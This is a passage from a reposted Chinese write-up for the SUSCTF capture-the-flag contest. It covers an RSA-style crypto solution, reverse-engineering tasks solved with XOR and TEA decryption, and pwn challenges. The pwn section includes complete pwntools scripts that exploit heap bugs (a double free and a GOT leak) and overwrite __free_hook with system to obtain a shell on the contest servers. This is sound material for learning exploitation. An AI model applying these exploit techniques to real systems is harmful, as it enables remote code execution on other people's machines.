29079278948514755758174884809479690995427980775293393456403529481055942899970158049070109142310832516606657100119207595631431023336544432679282722485978175459551109374822024850128128796213791820270973849303929674648894135672365776376696816104314090776423931007123128977218361110636927878232444348690591774581974226318856099862175526133892pl=[2,7,757,1709,85015583,339028665499,149105250954771885483776047,1642463892686572578602085475101104723805585678675707586553009837707279291648160744722745420570786735582631019452016654157586623543454908938807521637550223579103317696104438456966780396624343550451096013730928292041667133825444056448136643704677066463120079]ql=[2,3,66553,81768440203,84405986771,38037107558208320033]rl=[2,5156273,10012111,11607389,68872137169799749,9691125310820433463]def get_e(c,pl,p): l=[] for e in pl: if pow(c,(p-1)//e,p)==1: l.append(e) return lprint(get_e(c,pl,p))print(get_e(c,ql,q))print(get_e(c,rl,r))# [757]# [2, 66553]# [2, 5156273]
得出的结果还需满⾜条件
assert isPrime(GCD(e,p-1)) and isPrime(GCD(e,q-1)) and isPrime(GCD(e,r-1)) and e==GCD(e,p1)*GCD(e,q-1)*GCD(e,r-1)
最终结果是

m是经过padding的,所以m的有效字节不超过2L个,也就是2048位,⽽p,q,r都是1024位所以只需要任意两个模p,q,r 下的m就能恢复m 因为 较⼤,所以选⽤p,q ⽤AMM算法解出 的所有可能的结果,分别是 

个,还是很⼤的。
脚本
链接:https://pan.baidu.com/s/1TJU7pbEzH84a4AIQ5iE2zQ 提取码:imaq

04

Reverse

1

hell_world

首先,没有识别出类型

发现了.vhdl的后缀

在sub_14003CAB0里找到了提示语句

程序有while和case组成,case 5的时候就失败,直接开始调试,这个函数就是开始输入。

通过观察,flag的长度为44,在case 8这里,逐个字节比较,44个字节相同时,就成功。

case 9这里是加密的地方

case10,密文在dword_7FF7E1975C50里

提取出密文

86,218,205,58,126,134,19,181,29,157,252,151,140,49,107,201,251,26,226,45,220,211,241,244,54,9,32,66,4,106,113,83,120,164,151,143,122,114,57,232,61,250,64,61

发现了很可疑的数据

提取出来

5,143,158,121,42,192,104,129,45,252,207,164,181,85,95,228,157,35,214,29,241,231,151,145,6,36,66,113,60,88,92,48,25,198,245,188,75,66,93,218,88,155,36,64

猜测是异或

#include<stdio.h>int main(){ int a[50]={86,218,205,58,126,134,19,181,29,157,252, 151,140,49,107,201,251,26,226,45,220,211,241,244,54, 9,32,66,4,106,113,83,120,164,151,143,122,114,57,232,61,250,64,61}; int b[50]={5,143,158,121,42,192,104,129,45,252,207,164,181,85, 95,228,157,35,214,29,241,231,151,145,6,36,66,113,60,88,92, 48,25,198,245,188,75,66,93,218,88,155,36,64}; for(int i=0;i<44;i++) { printf("%c",a[i]^b[i]); } return 0;}SUSCTF{40a339d4-f940-4fe0-b382-cabb310d2ead}

2

DigitalCircuits

py打包的exe⽂件,有⻩鸭⼦图标,⽆壳

python [pyinstxtractor.py](http://pyinstxtractor.py/) DigitalCircuits.exe
[https://tool.lu/pyc/](https://tool.lu/pyc/)
#!/usr/bin/env python# visit https://tool.lu/pyc/ for more informationimport timedef f1(a, b): if a == '1' and b == '1': return '1' return Nonedef f2(a, b): if a == '0' and b == '0': return '0' return Nonedef f3(a): if a == '1': return '0'if None == '0': return '1'def f4(a, b): return f2(f1(a, f3(b)), f1(f3(a), b))def f5(x, y, z): s = f4(f4(x, y), z) c = f2(f1(x, y), f1(z, f2(x, y))) return (s, c)def f6(a, b): ans = '' z = '0' a = a[::-1] b = b[::-1] for i in range(32): ans += f5(a[i], b[i], z)[0] z = f5(a[i], b[i], z)[1]  return ans[::-1]def f7(a, n): return a[n:] + '0' * ndef f8(a, n): return n * '0' + a[:-n]def f9(a, b): ans = '' for i in range(32): ans += f4(a[i], b[i])  return ansdef f10(v0, v1, k0, k1, k2, k3): s = '00000000000000000000000000000000' d = '10011110001101110111100110111001' for i in range(32): s = f6(s, d) v0 = f6(v0, f9(f9(f6(f7(v1, 4), k0), f6(v1, s)), f6(f8(v1, 5), k1))) v1 = f6(v1, f9(f9(f6(f7(v0, 4), k2), f6(v0, s)), f6(f8(v0, 5), k3)))  return v0 + v1k0 = '0100010001000101'.zfill(32)k1 = '0100000101000100'.zfill(32)k2 = '0100001001000101'.zfill(32)k3 = '0100010101000110'.zfill(32)flag = input('please input flag:')if flag[0:7] != 'SUSCTF{' or flag[-1] != '}': print('Error!!!The formate of flag is SUSCTF{XXX}')time.sleep(5) exit(0)flagstr = flag[7:-1]if len(flagstr) != 24: print('Error!!!The length of flag 24') time.sleep(5) exit(0)res = ''for i in range(0, len(flagstr), 8): v0 = flagstr[i:i + 4] v0 = bin(ord(flagstr[i]))[2:].zfill(8) + bin(ord(flagstr[i + 1]))[2:].zfill(8) +bin(ord(flagstr[i + 2]))[2:].zfill(8) + bin(ord(flagstr[i + 3]))[2:].zfill(8) v1 = bin(ord(flagstr[i + 4]))[2:].zfill(8) + bin(ord(flagstr[i + 5]))[2:].zfill(8) +bin(ord(flagstr[i + 6]))[2:].zfill(8) + bin(ord(flagstr[i + 7]))[2:].zfill(8) res += f10(v0, v1, k0, k1, k2, k3)if res =='001111101000100101000111110010111100110010010100010001100011100100110001001101011000001110001000001110110000101101101000100100111101101001100010011100110110000100111011001011100110010000100111': print('True')else: print('False')time.sleep(5)

通过分析这个python脚本,发现就是数字电路,它定义的那些函数相当于是与⾮⻔,f1是与⻔,f2是⾮⻔,也就是 定义了⼏个函数,完事flag的⻓度为32,经过它定义的函数运算要得到下⾯的01串 第⼆部分的运算就是函数套函数,⽐较麻烦,直接⽤z3会报错,把⾥⾯的⼆进制数据转换成hex,发现是tea的delta 值

对应的是这里

这几个对应的是tea加密的密钥

下面正好是8个一组的分组加密,所以是tea加密,写出脚本

#include <stdio.h> #include <stdint.h> //解密函数 void decrypt (uint32_t* v, uint32_t* k) {  uint32_t v0=v[0], v1=v[1], sum=0xC6EF3720, i; /* set up */  uint32_t delta=0x9e3779b9; /* a key schedule constant */  uint32_t k0=k[0], k1=k[1], k2=k[2], k3=k[3]; /* cache key */  for (i=0; i<32; i++) { /* basic cycle start */  v1 -= ((v0<<4) + k2) ^ (v0 + sum) ^ ((v0>>5) + k3);  v0 -= ((v1<<4) + k0) ^ (v1 + sum) ^ ((v1>>5) + k1);  sum -= delta;  } /* end cycle */  v[0]=v0; v[1]=v1; int main() {  uint32_t v[]={1049184203, 3432269369, 825590664, 990603411, 3663885153, 992896039},k[4]={17477,16708,16965,17734};  decrypt(v, k); decrypt(v+2, k); decrypt(v+4, k); for(int j=0;j<6;j=j+2) { for(int i = 0; i < 4; i++){ putchar(((char *)&v[j])[3-i]); } for(int i = 0; i < 4; i++) { putchar(((char *)&v[j+1])[3-i]); } } return 0; }

05

Pwn

1

happytree

本题实现了⼀个⼆叉树,节点的数据结构如下

00000000 node struc ; (sizeof=0x20, mappedto_9)00000000 size dd ?00000004 gap dd ?00000008 data dq ? ; offset00000010 next_X dq ? ; offset00000018 next_Y dq ? ; offset00000020 node ends

本题的漏洞点在于添加节点申请堆块时没有将堆块的残留清空,并且没有对输⼊进⾏0截断,这样就可以很轻松的 泄露出堆地址,此外,在删除节点时也没有对其进⾏清空,这样next_X ,和next_Y是不会被清空的,那么我们就可 以伪造节点的⼦节点来实现 double free 另外有⼀些细节,可以double free 0x80 ⼤⼩以上的堆块,再申请⼏次就可以让 0x80 ⼤⼩的 tcache count 变成 -1, 这样在 free 0x80 ⼤⼩的堆块就可以放⼊ unsorted bin,个⼈感觉这样处理是⽐较好的。

# -*- encoding: utf-8 -*-import sysimport osimport requestsfrom pwn import *binary = './happytree'os.system('chmod +x %s'%binary)context.binary = binarycontext.log_level = 'debug'elf = ELF(binary)libc = elf.libc# libc = ELF('')DEBUG = 0if DEBUG: libc = elf.libc p = process(binary) # p = process(['qemu-arm', binary]) # p = process(['qemu-arm','-g','1234', binary]) # p = process(['qemu-aarch64','-L','','-g','1234',binary])else: host = '124.71.147.225' port = '9999'  p = remote(host,port)l64 = lambda : ras(u64(p.recvuntil('\x7f')[-6:].ljust(8,'\x00')))l32 = lambda : ras(u32(p.recvuntil('\xf7')[-4:].ljust(4,'\x00')))uu64= lambda a : ras(u64(p.recv(a).ljust(8,'\x00')))uu32= lambda a : ras(u32(p.recv(a).ljust(4,'\x00')))rint= lambda x = 12 : ras(int( p.recv(x) , 16))sla = lambda a,b : p.sendlineafter(str(a),str(b))sa = lambda a,b : p.sendafter(str(a),str(b))lg = lambda name,data : p.success(name + ': \033[1;36m 0x%x \033[0m' % data)se = lambda payload : p.send(payload)rl = lambda : p.recv()sl = lambda payload : p.sendline(payload)ru = lambda a : p.recvuntil(str(a))def ras( data ): lg('leak' , data) return datadef dbg( b = null): if (b == null): gdb.attach(p) pause() else: gdb.attach(p,'b %s'%b)def one_gadget(filename): log.success('Leak One_Gadgets...') one_ggs = str(subprocess.check_output(['one_gadget','--raw', '-f',filename])).split(' ') return list(map(int,one_ggs))def cmd(num): sla('>',num)def add(data , text = 'a'): cmd(1) sla('data:' , data) sa('content:' , text)def show( data ): cmd(3) sla('data:' , data)def delete( data ): cmd(2) sla('data:' , data)# one_gad = one_gadget(libc.path)# list = $rebase(0x00000000002022A0)def attack():  add(0x90 ) add(0x91 )  delete(0x91) delete(0x90) add(0x90 , '\x20') show(0x90) ru('content: ') heap_addr = uu64(6) - 0xc0 heap_base = heap_addr - 0x11e60 delete(0x90) fake_node = flat( 0x28 , heap_base + 0x10, heap_addr + 0x40 , heap_addr + 0x40 ) add(0x28 , fake_node) delete(0x28) fake_node = flat( 0x28 , heap_addr + 0x40 ) add(0x91 , fake_node) add(0x90 ) delete(0x90) add(0x90 , '\xa0') add(0x92 , '\xa0') add(0x93 , '\xa0') delete(0x91) add(0x38 , '\xa0')show(0x38) __malloc_hook = l64() - 352 - 0x10 libc.address = __malloc_hook - libc.sym['__malloc_hook'] system_addr = libc.sym['system'] __free_hook = libc.sym['__free_hook'] binsh_addr = libc.search('/bin/sh').next() lg('__free_hook',__free_hook) delete(0x38) add(0x94 , p64(__free_hook - 0x8)) add(0x30 ) add(0x38 , flat('/bin/sh\x00' , system_addr)) # dbg() delete(0x38) # dbg()  # p.success(getShell()) p.interactive()attack()'''

2

kqueue

问题出现在init脚本⾥⾯:

前面应该加一句poweroff -d time -f &

利用过程:

3

kqueue's revenge

flag在附件⾥

4

rain

#coding:utf-8import sysfrom pwn import *from ctypes import CDLLcontext.log_level='debug'elfelf='./rain'#context.arch='amd64'while True : # try : elf=ELF(elfelf) context.arch=elf.arch gdb_text=''' b *0x401699 telescope $rebase(0x202040) 16 ''' if len(sys.argv)==1 : clibc=CDLL('/lib/x86_64-linux-gnu/libc-2.27.so') io=process(elfelf) gdb_open=1 # io=process(['./'],env={'LD_PRELOAD':'./'}) clibc.srand(clibc.time(0)) libc=ELF('/lib/x86_64-linux-gnu/libc-2.27.so') # ld = ELF('/lib/x86_64-linux-gnu/ld-2.23.so') one_gadgaet=[0x45226,0x4527a,0xf03a4,0xf1247] else : clibc=CDLL('/lib/x86_64-linux-gnu/libc-2.27.so') io=remote('124.71.185.75',9999) gdb_open=0 clibc.srand(clibc.time(0)) libc=ELF('./libc.so.6') # ld = ELF('/lib/x86_64-linux-gnu/ld-2.23.so') one_gadgaet=[0x45226,0x4527a,0xf03a4,0xf1247] def gdb_attach(io,a): if gdb_open==1 : gdb.attach(io,a) def choice(a):io.sendlineafter('ch> ',str(a)) def set(a,b,c,d,e,f): choice(1) pay=p32(a)+p32(b)+p8(c)+p8(d)+p32(e) pay+=f io.sendafter('FRAME> ',pay) def show(): choice(2) def rain(): choice(3) # for i in range(8): set(0x20,0x20,1,1,1,'a'*0x44) set(0x20,0x20,1,1,1,'aaaa') set(0x20,0x20,1,1,1,'aaaa') rain() pay='\x00'*0x28 pay+=p64(0x400E17) pay+=p64(elf.got['puts'])+'\x00' set(0,0,1,1,1,'a'*4+pay) show() libc_base=u64(io.recvuntil('\x7f')[-6:]+'\x00\x00')-libc.sym['puts'] libc.address=libc_base bin_sh_addr=libc.search('/bin/sh\x00').next() system_addr=libc.sym['system'] free_hook_addr=libc.sym['__free_hook'] set(0x20,0x20,1,1,1,'a'*0x64) set(0x20,0x20,1,1,1,'a'*0x14) set(0x20,0x20,1,1,1,'a'*4) set(0x20,0x20,1,1,1,'a'*4) set(0x20,0x20,1,1,1,'aaaa'+p64(free_hook_addr-8)) rain() set(0x20,0x20,1,1,1,'aaaa'+p64(free_hook_addr-8)) rain() set(0x20,0x20,1,1,1,'aaaa/bin/sh\x00'+p64(system_addr)) set(0x20,0x20,1,1,1,'aaaa') success('libc_base:'+hex(libc_base)) # success('heap_base:'+hex(heap_base)) # gdb_attach(io,gdb_text) io.interactive() # except Exception as e: # io.close() # continue # else:# continue

侵权请私聊公众号删文



文章来源: http://mp.weixin.qq.com/s?__biz=MzAxMjE3ODU3MQ==&mid=2650534627&idx=2&sn=530e1f6ee5c4d693fe2b0a42eee9df2c&chksm=83ba9707b4cd1e115544f78882cde79502ce20057b71636c4138a175eb2e5815e51bc16c2067#rd
如有侵权请联系:admin#unsafe.sh